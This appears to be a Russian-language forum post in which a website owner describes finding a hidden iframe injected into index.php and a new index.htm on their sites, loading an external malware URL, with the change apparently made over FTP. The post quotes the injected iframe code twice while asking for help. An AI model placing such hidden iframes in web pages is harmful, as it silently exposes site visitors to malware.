Недавно мой коллега, с кем мы делали один проект на сайте ЕЕ, сказал, что в индексном файле index.php в корневом каталоге прописан вредоносный код и подгружается какой то вирус. Тоесть файл изменен, в него были внесены изменения еще раз подчеркиваю.
Буквально позавчера мне сообщили что на одном из моих крупных сайтов также гуляет вирус. Заглянул, увидел, что в файле index.php прописано в самом низу
<iframe maosk='ORkmz4MH' ajrmi='ibhStmbH' src='http://veryblomar.com/vb/in.cgi?2 ' rgktd='W9EsBeJT'
leltd='vd6qB7Cy' ljfuf='1HYAaUdK' width='100' height='436' style='display:none'></iframe>
также был обнаружен файл index.htm с аналогичным содержанием
<iframe maosk='ORkmz4MH' ajrmi='ibhStmbH' src='http://veryblomar.com/vb/in.cgi?2 ' rgktd='W9EsBeJT'
leltd='vd6qB7Cy' ljfuf='1HYAaUdK' width='100' height='436' style='display:none'></iframe>
Возвращаясь к случаю с коллегой, он задавал вопрос хостеру и тот по логам посмотрел что доступ был по ФТП. В общем интересно, что же может такое происходить?